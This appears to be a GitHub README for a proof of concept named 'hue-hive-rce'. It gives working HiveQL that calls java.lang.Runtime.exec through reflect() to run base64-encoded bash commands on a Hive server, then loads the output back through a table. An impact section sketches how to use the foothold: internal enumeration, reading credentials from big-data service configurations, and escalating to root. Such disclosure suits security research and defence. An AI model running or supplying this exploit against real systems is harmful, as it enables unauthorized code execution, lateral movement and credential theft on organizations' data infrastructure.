Skip to content

Latest commit

 

History

History
26 lines (22 loc) · 1.3 KB

README.md

File metadata and controls

26 lines (22 loc) · 1.3 KB

hue-hive-rce

Preparation

create table workspace_hs.out as select "Hendrik Schultze @ InnoGames";
truncate table workspace_hs.out;

Command and get output

SELECT reflect("java.lang.Runtime", "exec", concat("bash -c {echo,",base64(encode("${cmd} &> /tmp/out", 'UTF-8')),"}|{base64,-d}|{bash,-i}"));
truncate table workspace_hs.out;
LOAD DATA LOCAL INPATH '/tmp/out' INTO TABLE workspace_hs.out;
select * from workspace_hs.out;

Example

alt text

Impact

Depending on the user (hive or worst case root) we can at least save and run scripts inside the datacenter from /tmp. Therefore we can use that server as base for future attacks in the whole environment, checking the local server (ss -tulpn,ps auxf, enumeration...) or watching for other server. Often internal Big Data systems are not fully protected because they are setup insecure by default. These allows us to read configurations (potential credentials etc) from the Apache ResourceManage, Apache ZooKepe, etc. As these BigData stack offer many APIs. We can submit MapRed Jobs, executed on HDFS, connect to Apache Kafka or many other options. If we should not be root, we often can easly to escalate to root e.G. with logrotten.